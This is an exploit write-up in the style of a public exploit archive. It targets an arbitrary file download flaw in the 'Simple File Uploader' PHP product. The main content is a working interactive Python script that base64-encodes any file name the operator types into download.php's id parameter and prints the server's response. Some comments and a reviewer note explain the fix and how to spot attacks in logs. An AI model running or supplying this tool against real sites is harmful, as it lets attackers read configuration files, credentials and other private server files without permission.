# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team




POC

#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
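# Start from an empty terminal before the banner is drawn.
os.system('clear')

# ANSI SGR colour escape sequences used to tint console output.
# Each one must begin with the ESC byte (\033). Without it the terminal
# prints the literal text "33[94m" instead of switching colour.
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"  # resets all attributes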

def banner():
    """Print the tool's ASCII-art banner, switching the terminal to white first."""
    art_rows = (
        WHITE + "",  # colour switch only; the row itself is empty
        " ## ## ",
        " ## ## ",
        " ############## ",
        " #### ###### #### ",
        " ###################### ",
        " ## ############## ## ",
        " ## ## ## ## ",
        " #### ####",
        "",
    )
    for row in art_rows:
        print(row)

def details():
    """Print the tool name and version line, followed by a blank line."""
    title_line = WHITE + " =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
    print(title_line)
    print("")

def core_commands():
    """Clear the terminal and print the list of console commands."""
    help_text = '''Core Commands ===============
Command Description ------- -----------
? Help menu
quit Exit the console
info Display information
download Exploit Vulnerability

'''
    os.system('clear')
    print(WHITE + help_text)

def about():
    """Clear the terminal and print the tool name and author credit."""
    credits_text = '''Simple File Uploader Download Tool v1.0.0 ===============
Author Description ------- -----------
Daniel Godoy https://www.exploit-db.com/author/?a=3146
'''
    os.system('clear')
    print(WHITE + credits_text)

def download():
    """Request a named file through download.php and print the response body.

    Prompts for a base URL and a file name, base64-encodes the file name,
    sends it as the ``id`` query parameter of ``download.php`` and prints
    whatever the server returns. Repeats until the operator answers ``n``.

    Reviewer note (defensive reading): the request shape implies that
    download.php base64-decodes ``id`` and uses the result as a file path,
    presumably without confining it to the upload directory. That matches
    the "Arbitrary File Download" title in the header. The remedy is
    server-side: resolve the decoded path and refuse anything outside the
    upload root, or hand out opaque identifiers instead of paths. In access
    logs, download.php requests whose decoded ``id`` contains path
    separators or ``..`` are a useful signal.
    """
    while True:
        urltarget = str(raw_input(WHITE + 'Target: '))
        plain_name = str(raw_input(WHITE + 'FileName: '))
        encoded_name = base64.b64encode(plain_name)

        # The URL is built once and used for both the log line and the request.
        final = urltarget + 'download.php?id=' + encoded_name
        print(RED + "[x]Sending Attack: " + WHITE + final)

        response = requests.get(final)
        print(response.text)

        again = str(raw_input(WHITE + 'Test other file? y/n: '))
        if again == 'n':
            print("Type quit to exit. Bye!")
            break



# Draw the banner and title once, then enter the interactive console.
banner()
details()

# Console commands mapped to their handlers. "quit" is handled separately
# because it ends the loop.
handlers = {
    "?": core_commands,
    "help": core_commands,
    "about": about,
    "info": about,
    "download": download,
}

option = '0'
while True:
    option = raw_input(RED + "pwn" + WHITE + " > ")
    if option == "quit":
        os.system('clear')
        option = 0
        break
    handler = handlers.get(option)
    if handler is None:
        # The trailing GREEN leaves the terminal in green for the next output.
        print("Not a valid option! Need help? Press ? to display core commands " + GREEN)
    else:
        handler()